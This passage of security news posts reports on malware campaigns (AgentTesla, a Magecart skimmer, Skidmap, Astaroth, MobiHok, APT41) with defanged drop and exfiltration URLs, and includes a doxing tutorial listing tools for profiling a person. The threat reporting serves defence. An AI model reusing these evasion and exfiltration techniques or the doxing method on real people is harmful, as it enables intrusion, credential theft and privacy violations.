  38. ud1451+=(char)(va46a7 ^ af474b5[(i/2) % af474b5.Length]);
  39. } return ud1451;
  40. }
  41. }

Code snippet 2

Code Snippet 2 is the C# class to be loaded. It has the objective to download the payload from the drop url previosly decoded by the “b72f3()” function: “hxxp://www.handrush[.com/wp-content/plugins/akismet/views/DurGhamPop[.exe”

The payload is stored into “%APPDATA%\Roaming” path and it is immediately executed through the “Process.Start()” function.

The Loader

ThreatAgent Tesla Loader
Brief DescriptionAgent Tesla .NET C# loader

Table 2. Static information about the AgentTesla evasive loader

The dropped file payload is a .NET executable embedding some anti-analysis tricks. If it is executed on a virtual environment, the malware kills itself. It also uses some anti-debugging trick to decide if terminate its execution.

Figure 3: Method after which the process kills itself

According to the MSDN documentation, the method Delegate.CreateDelegate “creates a delegate of the specified type that represents the specified static method of the specified class, with the specified case-sensitivity and the specified behavior on failure to bind“. This way, the control flow is switched to the delegated method which actually points to a DLL containing the anti-analysis logic.

Figure 4: Loading routine of the internal DLL

Before passing the control to the “swety.dll” library, which is a sort of helper component with no particular scope except the identification of analysis environments, the first instructions executed here are designed to decode and load a byte array embedded inside the executable, unpacking the obfuscated code.

Figure 5: Decoding routine of the DLL

The Figure above shows how this payload is encoded within the byte array and the routine invoked to retrieve it. This byte array is actually a well-formed dll loaded through the “Thread.GetDomain().Load()” method. At this point, the control finally passes to the “swety.dll” library, the module in charge to detect the analysis environment.

The “Swety” Module

ThreatSwety evasion module
Brief Description.NET Swety evasion module

Table 3. Static information about the “swety” evasive module

This component is always a .NET executable. The name of the classes are self-explicative: for instance, there are clear references to Virtual Machine detection logic. 

Figure 6: Example of the enumeration of the Hypervisors

In Figure 9, the malware retrieves the information about the current hardware and compares it with a defined set of criteria, when it finds a match, it kills itself. Otherwise, the dll continues its execution and loads another PE file hidden inside the initial loader. This last executable file runs as a new thread within the initial loader context.

Figure 7: Loading of the AgentTesla final payload

The Payload 

ThreatAgent Tesla
Brief DescriptionAgent Tesla Payload

Table 4. Static information about the AgentTesla payload

The extracted payload is a .NET binary file. AgentTesla and Hawkey have lots of pieces of code in common, and the analysis we made two months ago about the Hawkeye payload is similar to this one.

Figure 8: Recurrent string decryption routine through the usage of Rijndael algorithm

Also in this case every sensitive information, string or other information  is encrypted through Rijndael algorithm and it tries to evade the sandbox to the common user names of the principal sandboxes. The persistence mechanisms is practically the same and the installation path of detected during the analysis is “%APPDATA%/Roaming/SecondLORI/SecondLORI.exe” 

Figure 9: Sandbox evasion trick
Figure 10: Persistence mechanism

After its installation, the malware starts to retrieve all the credential stored within a wide list of web browsers, FTP clients, File Downloaders etc. For instance, it is able to steal accounts from:

  • Google Chrome
  • Yandex
  • Comodo Dragon
  • Cool Novo
  • Chromium
  • Torch Browser
  • 7Star
  • Amigo
  • Brave
  • Cent Browser
  • Chedot
  • Coccoc
  • Elements Browser
  • Epic Privacy
  • Kometa
  • Orbitum
  • Sputnik
  • Uran
  • Vivaldi
  • UC Browser
  • Flock Browser
  • CoreFTP
  • FileZilla
  • JDownloader
  • QQBrowser
  • Outlook
  • SeaMonkey
  • Thunderbird

The harvested credentials are then sent back to the attacker servers. The malware leverages the .NET API to easily set up a mail client to transmit the loot to a particular mailbox.

Figure 11: SMTP client account configuration

The name of the sender, “Lori”, matches the name in the persistence mechanism, “SecondLORI”. This username may belong to a previously compromised email account the attacker uses as a sort of SMTP relay to deliver the loot to the real exfiltration address, a GMail mailbox named “”. 

Figure 12: SMPT communication


As we stated in the previous post about a custom weaponization of the Hawkeye info-stealer, these kinds of malware are well known and highly used by cyber criminals. But despite their popularity event into the info-sec community, these “commodity tools” still result to be quite effective especially when combined within custom multistage infection chains, renewing their dangerousness and effectiveness.

Further technical details, including Indicators of Compromise, are reported in the analysis published by the experts at the Cybaz-Yoroi ZLAB.

Pierluigi Paganini

(SecurityAffairs – AgentTesla, malware)

The post Commodity Malware Reborn: The AgentTesla “Total Oil” themed Campaign appeared first on Security Affairs.

Magecart attackers target mobile users of hotel chain booking websites

Trend Micro researchers reported that a Magecart group has hacked the websites of two hotel chains to inject scripts targeting Android and iOS users.

Researchers discovered a series of incidents involving software credit card skimmer used by Magecart to hit the booking websites of hotel chains.

In early September, the researchers discovered a JavaScript code onto two hotel websites belonging to different hotel chains. The JavaScript code was used to load a remote script on their payment page since August 9. 

“When we first checked the script’s link, it downloaded a normal JavaScript code. However, we found that the same link could also download a different script when we requested it from mobile devices like Android or iOS phones.” reads the analysis published by Trend Micro. “The downloaded script for mobile devices is a credit card skimmer which can steal the information entered on the hotel booking page and send it to a remote server.”

Experts noticed that the link would deliver a credit card skimmer script only when users visited the websites using mobile devices, suggesting that the attackers aimed at targeting only mobile users.

Trend Micro noticed that infected websites were developed by Roomleader, a firm that designs online booking websites. Threat actors injected the malicious code in the Roomleader module “viewedHotels.”

Although the module was only used for two websites of two different hotel chains, the number of potential victims is very high, as one of these brands has 107 hotels in 14 countries, while the other has 73 hotels in 14 countries.

“Despite the seemingly small number of affected sites, we still consider the attack significant given that one of the brands has 107 hotels in 14 countries while the other has 73 hotels in 14 countries. Note that we have reached out to Roomleader regarding this issue.” continues the analysis.


The code injected in the websites first checks if an HTML element containing the ID “customerBookingForm” is present on the webpage to verify that it is running on the hotel’s booking page.

If the code detects the booking page, it will check if the browser debugger is closed and then load another JavaScript from the URL hxxps://googletrackmanager[.]com/gtm[.]js that contains the card skimmer code.

The skimmer hooks the JavaScript events that are triggered when customers make a payment or submit a booking. When these events happen, the skimmer checks if the browser debugger is closed, then copies the name and value from “input” or “select” HTML elements on the booking page.

The skimmer script used in these attacks collects customers’ data, including names, email addresses, telephone numbers, hotel room preferences, and of course, credit card details.

The script encrypts data with RC4 using a hardcoded key, encoded using XOR, and then sent via HTTP POST to “https://googletrackmanager[.]com/gtm.php?id=.” The scripts appens the random string used to encode the data at the end.

The software skimmer replaces the original credit card form on the booking page, in this way attackers could require customers to submit all credit card data, including the CVC number that is not required in some booking pages. This trick also works to collect all customers data when the websites use secure iframes to load the credit card form from a different domain.

Magecart attackers created fake credit card forms in English, Spanish, Italian, French, German, Portuguese, Russian, and Dutch.

Trend Micro pointed out the network infrastructure and the scripts used in this attack could not be strongly linked to previous Magecart attacks.

“We were unable to find any strong connections to previous Magecart groups based on the network infrastructure or the malicious code used in this attack. However, it’s possible that the threat actor behind this campaign was also involved in previous campaigns.” concludes Trend Micro.

Pierluigi Paganini

(SecurityAffairs – Magecart, hacking)

The post Magecart attackers target mobile users of hotel chain booking websites appeared first on Security Affairs.

Skidmap Linux miner leverages kernel-mode rootkits to evade detection

Trend Micro researchers spotted a piece of Linux cryptocurrency miner, dubbed Skidmap that leverages kernel-mode rootkits to evade the detection.

Skidmap is a new piece of crypto-miner detected by Trend Micro that target Linux machines, it uses kernel-mode rootkits to evade the detection.

This malware outstands similar miners because of the way it loads malicious kernel modules to evade the detection.

The crypto-miner set up a secret master password that uses to access any user account on the system.

“These kernel-mode rootkits are not only more difficult to detect compared to its user-mode counterparts — attackers can also use them to gain unfettered access to the affected system. A case in point: the way Skidmap can also set up a secret master password that gives it access to any user account in the system.” states the analysis published by TrendMicro. “Conversely, given that many of Skidmap’s routines require root access, the attack vector that Skidmap uses — whether through exploits, misconfigurations, or exposure to the internet — are most likely the same ones that provide the attacker root or administrative access to the system.”

Experts noticed that several routines implemented by Skidmap require root access, suggesting that its attack vector is the same that provided the attackers with root or administrative access to the system.

The infection chain sees the Skidmap miner installing itself via crontab, then the malicious code downloads and executes the main binary. The malware decreases the security settings of the target systems by configuring the Security-Enhanced Linux (SELinux) module to the permissive mode or by disabling the SELinux policy and setting selected processes to run in confined domains. The miner also set up backdoor access to the infected system.

Skidmap also provides attackers with backdoor access to the infected machine.

Skidmap also sets up a way to gain backdoor access to the machine. It does this by having the binary add the public key of its handlers to the authorized_keys file, which contains keys needed for authentication.” continues the report.

“Besides the backdoor access, Skidmap also creates another way for its operators to gain access to the machine. The malware replaces the system’s file (the module responsible for standard Unix authentication) with its own malicious version”

The main binary checks whether the system runs on Debian or RHEL/CentOS, then drops the miner and other for the specific Linux distro.

Trend Micro experts revealed that the Skidmap miner has notable components designed to obfuscate its activities and ensure that they continue to run. Samples of these components are:

A fake “” binary that replaces the original, once executed it will randomly set up a malicious cron job to download and execute a file.

Another component is “kaudited,” s file installed as /usr/bin/kaudited that drops and installs several loadable kernel modules (LKMs). The kaudited binary also drops a watchdog component used to monitor the mining process.

Trend Micro also described the “iproute” module that hooks the system call getdents that is normally used to read the contents of a directory, with the intent of hiding specific files.

The last component is “netlink,” a rootkit that can fake the network traffic statistics and CPU-related statistics to hide the activity of the malware.

Skidmap uses fairly advanced methods to ensure that it and its components remain undetected. For instance, its use of LKM rootkits — given their capability to overwrite or modify parts of the kernel — makes it harder to clean compared to other malware.” Trend Micro concludes. “In addition, Skidmap has multiple ways to access affected machines, which allow it to reinfect systems that have been restored or cleaned up,”

Pierluigi Paganini

(SecurityAffairs – Skidmap miner, Linux)

The post Skidmap Linux miner leverages kernel-mode rootkits to evade detection appeared first on Security Affairs.

Fraudulent purchases of digitals certificates through executive impersonation

Experts at ReversingLabs spotted a threat actor buying digital certificates by impersonating legitimate entities and then selling them on the black market.

Researchers at ReversingLabs have identified a new threat actor that is buying digital certificates by impersonating company executives, and then selling them on the black market. The experts discovered that digital certificates are then used to spread malware, mainly adware.

Threat actors sign their malware with legitimate digital certificates to avoid detection.

The experts provided details of a certificate fraud that leverages on the executive impersonation. The researchers provided evidence that the threat actors sold the purchased certificates to a cybercrime gang that used them to spread malware.

The analysis published by Reversinglabs provides technical details for each phase of the certificate fraud carried out by impersonating executive.

The fraud begins with the reconnaissance phase in which the attackers select the target to impersonate. Threat actors use publicly available information to select candidates that are usually well-established people working in the software industry.

Once identified, the threat actors scrape victim’s information from open sources, such as their public LinkedIn profile page. Then attackers set up legitimate-looking infrastructure for the entity they are impersonating in the attempt to deceive certificate authorities.

“The attacker aims to use the top-level domain confusion in order to mislead the certificate authority during their identity verification process. The gamble is that the person verifying the certificate issuance request will assume that the same company owns both the global .COM and the regional .CO.UK domains for their business.” reads the analysis published by the experts.

“Here’s where the choice of registrar becomes truly important. Since GDPR legislation came into effect, most EU domain registrars have agreed that WHOIS records are considered private and personally identifiable information. This makes knowing the true identity behind the registered domain name subject to a data release process – a bureaucratic procedure meant to be fulfilled in cases of a legitimate enquiry such as a trademark dispute or a law enforcement request.”

Once set up the infrastructure, the threat actors then proceed to purchase the certificates and verify them. The verification is done using a public antivirus scanning service, then the threat actors use the file scan record as “a clean bill of health” for potential buyers.

2019-04-30 07:07:59 – The first signed malicious file appears in the wild. The certificate is used to sign OpenSUpdater, an adware application that can install unwanted software on the client’s machine. This executable is cross-signed for timestamp verification via Symantec Time Stamping Services Signer service.” continues the analysis.

The experts pointed out that even if it is harder for the attacker to acquire digital certificates, the threat actors they tracked has shown that it is in fact possible to do so.

Pierluigi Paganini

(SecurityAffairs – digital certificates, hacking)

The post Fraudulent purchases of digitals certificates through executive impersonation appeared first on Security Affairs.

MobiHok RAT, a new Android malware based on old SpyNote RAT

A new Android malware has appeared in the threat landscape, tracked as MobiHok RAT, it borrows the code from the old SpyNote RAT.

Experts from threat intelligence firm SenseCy spotted a new piece of Android RAT, dubbed MobiHok RAT, that used code from the old SpyNote RAT.

At the beginning of July 2019, the experts spotted a threat actor dubbed mobeebom that was offering for sale an Android Remote Administration Tool (RAT) dubbed MobiHok v4 on a prominent English hacking forum.

The experts discovered that mobeebom is active on multiple Arab-speaking hacking forums under different pseudonyms, a circumstance that suggests that he is an Arab-speaker. Researchers also noticed that the posts published by the hacker were using poor English.

mobeebom has been promoting the MobiHok RAT through multiple channels, including YouTube and a dedicated Facebook page, since January 2019.


MobiHok is written in Visual Basic .NET and Android Studio, it allows to fully control the infected device. Experts pointed out that the latest release of the RAT implements new features, including a bypass to the Facebook authentication mechanism.

The analysis conducted by the experts suggests that the threat actor obtained SpyNote’s source code and made some minor changes to its code before reselling it online.

“However, from a research we conducted into mobeebom’s activity in the underground communities, and the analysis of a sample of the malware builder we retrieved, it is apparent that the threat actor based MobiHok on the source code of another prominent Android RAT named SpyNote, which was leaked online in 2016.” continues the report.

“The initial findings of our technical analysis confirmed that mobeebom probably obtained SpyNote’s source code, made some minor changes, and now resells it as a new RAT under the name MobiHok.”

In July 2016, experts from Palo Alto Networks a RAT offered for free called Spynote, much like OmniRat and DroidJack, today the malware can be purchased from a website on the surface web, or downloaded for free from a forum.

MobiHok supports several features, including access to files, access to the camera, keylogging, control over SMS and contacts, the ability to bypass both Samsung security mechanisms and Google Play mechanisms, and to bind itself to another APK app.

“To conclude, despite mobeebom’s attempt to market his MobiHok v4 Android RAT as new and his declared intention to make it the top Android RAT on the market, it appears that this malware is based on the leaked source code of the known SpyNote Android RAT with only minor changes and is being reselled by the threat actor under a different name.” concludes Sensecy.

Pierluigi Paganini

(SecurityAffairs – MobiHok RAT, malware)

The post MobiHok RAT, a new Android malware based on old SpyNote RAT appeared first on Security Affairs.

DOXing in 2019

During the early 2000s in private chats or even in public IRC channels, self-styled “hackers” used to DOX people in order to prove their competence in “dark arts” (cit. Proceedings of the 39th SIGCSE). I always was fascinated by those guys that with few information such as an email address or a nickname were able to find out much of your entire life just looking on the web. Today, after several years a friend of mine asked me to start a DOX session against himself in order to evaluate what ‘Internet’ knows about him.

What is DOX ?

“Doxing” is a neologism that has evolved over its brief history. It comes from a spelling alteration of the abbreviation “docs” (for “documents”) and refers to “compiling and releasing a dossier of personal information on someone”. Essentially, doxing is revealing and publicizing records of an individual, which were previously private or difficult to obtain.

The term dox derives from the slang “dropping dox” which, according to Wired writer Mat Honan, was “an old-school revenge tactic that emerged from hacker culture in 1990s”. Hackers operating outside the law in that era used the breach of an opponent’s anonymity as a means to expose opponents to harassment or legal repercussions.

wikipedia: about DOXing

Nowadays the word DOX or the action to DOX someone gets a bad flavor since it undermines the victim privacy by publicly exposing sensitive data that the DOXer (aka who is performing the DOXing action) has collected and/or correlated. I will not expose any data but I’ll get the chance to review techniques and tools in order to give to my readers an updated view of DOXing tools in 2019.

DOXing methodology

When you start a DOXing session you might decide to play it by ear or to approach the problem with a methodology. Methodologies are not simple at this point since you need to map a back-to-forward and vice-versa information flow. In other words you need to forecast victim’s information that you might get from a victim’s peer or from a victim’s relative, so you need to be able to move from one peer to another one and to stop when you are moving far from the original victim. The feeling that stops you in getting too faraway from the original victim is something quite hard to define, we might decide to use an information threshold such as: after [random number] of iteration, or for example, only on public social profiles, or again getting deeper by defining everything is not involving another entity. Everything we define could be over-killing or restricting in the same way. So my best advise is to follow the path until you feel you are getting too far for your target, at that point wrap back information and start to focus on another way. The following image shows a simple flow that you might decide to take.

Simplified DOXing Flow

A simple but yet useful advise would be to take note to every finding coming from both: manual analysis and automatic analysis. It could sound as trivial suggestion, but I’m sure you will appreciate it once you will get hands dirty on such amount of data you might spot ! I’m used to Maltego, since it automates many searching steps, but there are many great tools out there, find your best fit and keep note of what you do !

Example from Maltego Blog

Used Tools

Fortunately there are a lot of tools for OSINT/Personal-INT which would be great to use. In the following list I’ve just selected some of them, the ones I personally think would get better results in 2019.

  • Doxing (by Hacking Live). It’s not super updated, but hey… Doxing is an ancient practice ! It works quite well and helps to automate many searches.
  • DoxTracker (by Kuro-Code). It would definitely help your automation searches since it includes many tracking web sites.
  • Maltego (by Paterva). Well maybe it’s the king of public information gathering, depending on how many services you will sign-in (Services are information sources) it extracts tons of information on your target.
  • FOCA (by Elevenpaths). FOCA (github) is another great and well-known software that allows you to automate many finding tasks. Unfortunately it runs only on a Windows machine, so if you are Unix/FreeBSD user you need to emulate a Windows OS.
  • FamilyTree. Is a great tool to try with. If you are lucky and your target is inside their DB, oh boy, you’ll get out tons of information to his relatives.
  • TruePeopleSearch. Very useful to find out address and/or phone numbers. It mainly works on US though.
  • PeekYou. It works great by searching on various sources including social networks and phone books. It works independently from the target states
  • Lullar. Another great social aggregation profiler. You can insert first and last name, nickname or the target email, it will check if the target is on socials and will provide you direct link to target social profile.
  • CheckUserNames. Sometimes you want to check if specific usernames exist on social networks. If this is your need CheckUserNames works great.
  • TinEye, Google Image Search, When you start to investigate pictures you could need to locate a specific picture, to do that you might want to find out similar pictures and seeking for comments/tags into similar pictures in order to locate the original picture.
  • Git-Fingerprint. Sometimes your target knows GIT and he might be using it.
  • PictaME. If you need to analyze Instagram profiles and or to check Instagram pictures without an Instagram account

It would be obvious, I know … but don’t forget Google searches. Automatic searches are great since speed you up, but Google and Bing! own a lot of information on your target. My best findings come from manual searches on google by correlating social comments and images.

This activity produced an acclaimed newspaper article on Scienze “La Repubblica” (Biggest Italian Newspaper) on 12 September 2019.

Scienze “La Repubblica” 12 Settembre 2019

Astaroth Trojan leverages Facebook and YouTube to avoid detection

Cofense experts uncovered a new variant of the Astaroth Trojan that uses Facebook and YouTube in the infection process.

Researchers at Cofense have uncovered a phishing campaign targeting Brazilian citizens with the Astaroth Trojan that uses Facebook and YouTube in the infection process.

The attach chain appears to be very complex and starts with phishing messages that come with an .htm file attached. At each step of the infection process, threat actors leverage trusted sources and the interaction of the end-user. At every turn in the infection chain, the malware uses legitimate services to evade detection.

Cofense Intelligence™ has identified a phishing campaign targeting Brazilian citizens with the Astaroth Trojan in which Facebook and YouTube profiles are used in support of the infection.” reads the analysis published by Cofense.” There are numerous stages within this infection chain that could have been stopped with properly layered defenses on the email and network security stack. However, at each step of the infection, this campaign uses trusted sources and the end user to help advance to the next stage, ultimately leading to an eventual exfiltration of sensitive information.”

The Astaroth Trojan was first spotted by security firm Cofense in late 2018 when it was involved in a campaign targeting Europe and Brazil. The malware abused living-off-the-land binaries (LOLbins) such as the command line interface of the Windows Management Instrumentation Console (WMIC) to download and install malicious payloads in the background. According to the experts, LOLbins are very effecting in evading antivirus software. 

In the recent campaign, the experts observed three differed kind of emails written in Portuguese used in this phishing campaign, one using an invoice theme, another with show ticket theme and a third one using civil lawsuit theme.

“This campaign also utilized Cloudflare workers (JavaScript execution environment) to download modules and payloads, negating network security measures. Using these resources adds to the trusted source methodology employed by this campaign to bypass the security stack.” continues the analysis.

Once the victims have clicked on the attachment, the .HTM file downloads a .ZIP archive that contains a malicious .LNK file. The .LNK file then downloads JavaScript code from a Cloudflare workers domain, that in turn downloads multiple modules and payloads that are used to help obfuscate and execute a sample of the Astaroth information-stealer.

Among the files downloaded in the infection process there are two .DLL files that are joined together into a legitimate program named ‘C:\Program Files\Internet Explorer\ExtExport.exe.’

The use of a legitimate program to run the malicious code resulting from the union of the two DLLs downloaded from a trusted source allows bypassing security measures.

“After ExtExport.exe is running with the malicious code side-loaded, it uses a technique known as process hollowing to execute a legitimate program within a suspended state.” continues the expert. Process hollowing is used to inject malicious code retrieved from multiple files downloaded by the earlier JavaScript. The legitimate programs that were targeted for process hollowing were unins000.exe, svchost.exe, and userinit.exe.”

The experts noticed that the Astaroth Trojan involved in this campaign uses YouTube and Facebook profiles to host and maintain the C2 configuration data.

The C2 data are encoded in base64 format as well as custom encrypted, attackers inserted them within posts on Facebook or the profile information about user accounts on YouTube. This trick allows the attackers to bypass content filtering and other network security measures.

“The threat actors are also able to dynamically change the content within these trusted sources so they can deter the possibility of their infrastructure being taken down.” continues the researchers.

The Astaroth storage is able to steal sensitive information, including financial information, stored passwords in the browser, email client credentials, SSH credentials. The information gathered by the malware is encrypted with two layers of encryption and sent via HTTPS POST to a site from the C2 list, experts noticed that most of the sites are hosted on Appspot.

This phishing campaign exclusively targets Brazilians, the experts noticed that the initial .ZIP archive geo-fenced to Brazil.

However, experts warn that attackers could expand their activities to other countries using similar tactics.

“Astaroth leverages legitimate Microsoft Windows services to help propagate and deliver the payloads,” concludes the analysis.. “This campaign also utilized Cloudflare workers (JavaScript execution environment) to download modules and payloads, negating network security measures. Using these resources adds to the trusted source methodology employed by this campaign to bypass the security stack.”

In July, experts at the Microsoft Defender ATP Research Team discoveredfileless malware campaign that is delivering the information stealing Astaroth Trojan.

Pierluigi Paganini

(SecurityAffairs – Astaroth, malware)

The post Astaroth Trojan leverages Facebook and YouTube to avoid detection appeared first on Security Affairs.

Security Affairs newsletter Round 231

A new round of the weekly newsletter arrived! The best news of the week with Security Affairs

Hi folk, let me inform you that I suspended the newsletter service, anyway I’ll continue to provide you a list of published posts every week through the blog.

Once again thank you!

Experts found Joker Spyware in 24 apps in the Google Play store
Toyota Boshoku Corporation lost over $37 Million following BEC attack
University, Professional Certification or Direct Experience?
WordPress 5.2.3 fixes multiple issues, including some severe XSS flaws
Belarusian authorities seized XakFor, one of the largest Russian-speaking hacker sites
China-linked APT3 was able to modify stolen NSA cyberweapons
Stealth Falcon New Malware Uses Windows BITS Service to Stealthy Exfiltrate Data
Stealth Falcons undocumented backdoor uses Windows BITS to exfiltrate data
Symantec uncovered the link between China-Linked Thrip and Billbug groups
Telegram Privacy Fails Again
Wikipedia suffered intermittent outages as a result of a malicious attack
DoS attack the caused disruption at US power utility exploited a known flaw
Million of Telestar Digital GmbH IoT radio devices can be remotely hacked
Police dismantled Europes second-largest counterfeit currency network on the dark web
Robert Downey Jrs Instagram account has been hacked
Adobe September 2019 Patch Tuesday updates fix 2 code execution flaws in Flash Player
Dissecting the 10k Lines of the new TrickBot Dropper
Microsoft Patch Tuesday updates for September 2019 fix 2 privilege escalation flaws exploited in attacks
NetCAT attack allows hackers to steal sensitive data from Intel CPUs
Some models of Comba and D-Link WiFi routers leak admin credentials
The Wolcott school district suffered a second ransomware attack in 4 months
Iran-linked group Cobalt Dickens hit over 60 universities worldwide
LokiBot info stealer involved in a targeted attack on a US Company
SAP September 2019 Security Patch Day addresses four Security Notes rated as Hot News
SimJacker attack allows hacking any phone with just an SMS
Poland to establish Cyberspace Defence Force by 2024
The US Treasury placed sanctions on North Korea linked APT Groups
WatchBog cryptomining botnet now uses Pastebin for C2
Expert disclosed passcode bypass bug in iOS 13 a week before its release
Hackers stole payment data from Garmin South Africa shopping portal
InnfiRAT Trojan steals funds from Bitcoin and Litecoin wallets

Pierluigi Paganini

(SecurityAffairs – Newsletter, hacking)

The post Security Affairs newsletter Round 231 appeared first on Security Affairs.

Cybersquatting and Typosquatting victimizing innocent customers and brands

The rapid shift of brands towards online platforms and ecommerce portals, has opened the gates for cyber threats like Phishing, Cybersquatting and Typosquatting. In fact, every entity with an online presence today, feels burdened by the fear of compromising their brand reputation, in the face of these ubiquitous cyber threats….

APT41: A Dual Espionage and Cyber Crime Operation

Today, FireEye Intelligence is releasing a comprehensive report detailing APT41, a prolific Chinese cyber threat group that carries out state-sponsored espionage activity in parallel with financially motivated operations. APT41 is unique among tracked China-based actors in that it leverages non-public malware typically reserved for espionage campaigns in what appears to be activity for personal gain. Explicit financially-motivated targeting is unusual among Chinese state-sponsored threat groups, and evidence suggests APT41 has conducted simultaneous cyber crime and cyber espionage operations from 2014 onward.

The full published report covers historical and ongoing activity attributed to APT41, the evolution of the group’s tactics, techniques, and procedures (TTPs), information on the individual actors, an overview of their malware toolset, and how these identifiers overlap with other known Chinese espionage operators. APT41 partially coincides with public reporting on groups including BARIUM (Microsoft) and Winnti (Kaspersky, ESET, Clearsky).

Who Does APT41 Target?

Like other Chinese espionage operators, APT41 espionage targeting has generally aligned with China's Five-Year economic development plans. The group has established and maintained strategic access to organizations in the healthcare, high-tech, and telecommunications sectors. APT41 operations against higher education, travel services, and news/media firms provide some indication that the group also tracks individuals and conducts surveillance. For example, the group has repeatedly targeted call record information at telecom companies. In another instance, APT41 targeted a hotel’s reservation systems ahead of Chinese officials staying there, suggesting the group was tasked to reconnoiter the facility for security reasons.

The group’s financially motivated activity has primarily focused on the video game industry, where APT41 has manipulated virtual currencies and even attempted to deploy ransomware. The group is adept at moving laterally within targeted networks, including pivoting between Windows and Linux systems, until it can access game production environments. From there, the group steals source code as well as digital certificates which are then used to sign malware. More importantly, APT41 is known to use its access to production environments to inject malicious code into legitimate files which are later distributed to victim organizations. These supply chain compromise tactics have also been characteristic of APT41’s best known and most recent espionage campaigns.

Interestingly, despite the significant effort required to execute supply chain compromises and the large number of affected organizations, APT41 limits the deployment of follow-on malware to specific victim systems by matching against individual system identifiers. These multi-stage operations restrict malware delivery only to intended victims and significantly obfuscate the intended targets. In contrast, a typical spear-phishing campaign’s desired targeting can be discerned based on recipients' email addresses.

A breakdown of industries directly targeted by APT41 over time can be found in Figure 1.


Figure 1: Timeline of industries directly targeted by APT41

Probable Chinese Espionage Contractors

Two identified personas using the monikers “Zhang Xuguang” and “Wolfzhi” linked to APT41 operations have also been identified in Chinese-language forums. These individuals advertised their skills and services and indicated that they could be hired. Zhang listed his online hours as 4:00pm to 6:00am, similar to APT41 operational times against online gaming targets and suggesting that he is moonlighting. Mapping the group’s activities since 2012 (Figure 2) also provides some indication that APT41 primarily conducts financially motivated operations outside of their normal day jobs.

Attribution to these individuals is backed by identified persona information, their previous work and apparent expertise in programming skills, and their targeting of Chinese market-specific online games. The latter is especially notable because APT41 has repeatedly returned to targeting the video game industry and we believe these activities were formative in the group’s later espionage operations.

Figure 2: Operational activity for gaming versus non-gaming-related targeting based on observed operations since 2012

The Right Tool for the Job

APT41 leverages an arsenal of over 46 different malware families and tools to accomplish their missions, including publicly available utilities, malware shared with other Chinese espionage operations, and tools unique to the group. The group often relies on spear-phishing emails with attachments such as compiled HTML (.chm) files to initially compromise their victims. Once in a victim organization, APT41 can leverage more sophisticated TTPs and deploy additional malware. For example, in a campaign running almost a year, APT41 compromised hundreds of systems and used close to 150 unique pieces of malware including backdoors, credential stealers, keyloggers, and rootkits.

APT41 has also deployed rootkits and Master Boot Record (MBR) bootkits on a limited basis to hide their malware and maintain persistence on select victim systems. The use of bootkits in particular adds an extra layer of stealth because the code is executed prior to the operating system initializing. The limited use of these tools by APT41 suggests the group reserves more advanced TTPs and malware only for high-value targets.

Fast and Relentless

APT41 quickly identifies and compromises intermediary systems that provide access to otherwise segmented parts of an organization’s network. In one case, the group compromised hundreds of systems across multiple network segments and several geographic regions in as little as two weeks.

The group is also highly agile and persistent, responding quickly to changes in victim environments and incident responder activity. Hours after a victimized organization made changes to thwart APT41, for example, the group compiled a new version of a backdoor using a freshly registered command-and-control domain and compromised several systems across multiple geographic regions. In a different instance, APT41 sent spear-phishing emails to multiple HR employees three days after an intrusion had been remediated and systems were brought back online. Within hours of a user opening a malicious attachment sent by APT41, the group had regained a foothold within the organization's servers across multiple geographic regions.

Looking Ahead

APT41 is a creative, skilled, and well-resourced adversary, as highlighted by the operation’s distinct use of supply chain compromises to target select individuals, consistent signing of malware using compromised digital certificates, and deployment of bootkits (which is rare among Chinese APT groups).

Like other Chinese espionage operators, APT41 appears to have moved toward strategic intelligence collection and establishing access and away from direct intellectual property theft since 2015. This shift, however, has not affected the group's consistent interest in targeting the video game industry for financially motivated reasons. The group's capabilities and targeting have both broadened over time, signaling the potential for additional supply chain compromises affecting a variety of victims in additional verticals.

APT41's links to both underground marketplaces and state-sponsored activity may indicate the group enjoys protections that enables it to conduct its own for-profit activities, or authorities are willing to overlook them. It is also possible that APT41 has simply evaded scrutiny from Chinese authorities. Regardless, these operations underscore a blurred line between state power and crime that lies at the heart of threat ecosystems and is exemplified by APT41.

Scraping the TOR for rare contents

Scraping the “TOR hidden world” is a quite complex topic. First of all you need an exceptional computational power (RAM mostly) for letting multiple runners grab web-pages, extracting new links and re-run the scraping-code against the just extracted links. Plus a queue manager system to manage scrapers conflicts and a database to store scraped data need to be consistent. Second, you need great starting points. In other words you need the .onion addresses where your scrapers start from. You might decide to begin from common and well-known onion links such as The TOR-hidden-wiki or to start from great reddit threads such this one, but seldom those approaches bring you to what I refer as “interesting links”. For this post “interesting links” means specific links that are rare or not very widespread and mostly focused on cyber-attacks and/or cyber-espionage. Another approach needs be used in order to reach better results. One of the most profitable way to search for “interesting links” is to look for .onion addresses in temporal and up-to-date spots such as: temporal pasties, IRC chats, slack or telegram groups, and so on and so forth. In there you might find links that bring you to more rare contents and to less spread information.

Today I want to start from here by showing some simple stats about scraped .onion links in my domestic scraping cluster. From the following graph you might appreciate some statistics of active-and-inactive scraped hidden services. The represented week is actually a great stereotype of what I’ve got in the last whole quarter. What is interesting, at least in my personal point of view, is the percentage of offline (green) onion services versus the percentage of online (yellow) onion services.

Online (yellow) VS Offline (green) scraped sources

This scenario changed dramatically in the past few months. While during Q1 (2019) most of the scraped websites were absolutely up-and-running on Q2 (2019) I see, most of the scraped hidden services, dismissed and/or closed even if they persists in the communication channels (IRC chat, Pasties, Telegram, etc.).

I think there are dual factors that so much affected last quarter in spotting active hidden service. (1) Old content revamping. For example bots pushing “interesting links” back online even after months of inactivity. This activity is not new at all, but during the past quarter has been abused too many time respect to previous quarters. (2) Hidden services are changing address much more fast respect to few months ago. In order to make hard to spot malicious actors, they might decide to keep up-and-running their hidden services only for few hours and then change address/location. Is that way to enumerate hidden-services passing away or is it a simple weird time-frame ? We will see it during the next “Scraping” months, stay tuned !

Free Tool: LooCipher Decryptor

There are many ways to fight cyber-crime, but what we used to do in Yoroi is Malware analysis and Incident response by using special and proprietary technologies. Often analyses are enough to temporary block cyber-criminals by sharing to everybody IOC allowing National and International players (ISP, AV vendors, CERTs and so on) to block connections or to trash files. But sometimes when a ransomware hits a victim, the ultimate desire is to be able to decrypt those files and to restore the last consistent data set. Today we realized this ultimate scope and we want to release it public, to everybody needs a decryptor for LooCipher.

At the beginning of July Yoroi Z-Lab Team publicly released a quite exhaustive report about LooCipher (available here). The initial vector (through Microsoft Office Macro) was foreshadowing an important spread over the next few days. Indeed few days later Fortinet researchers released a nice report on LooCipher (available here) mostly focused on the encryption algorithm, where they discussed it through a python POC.

“LooCipher starts its encryption routine by generating a 16-byte data block with random characters chosen from the following predefined characters, using the current system time as seed. ”   

From Fortinet report

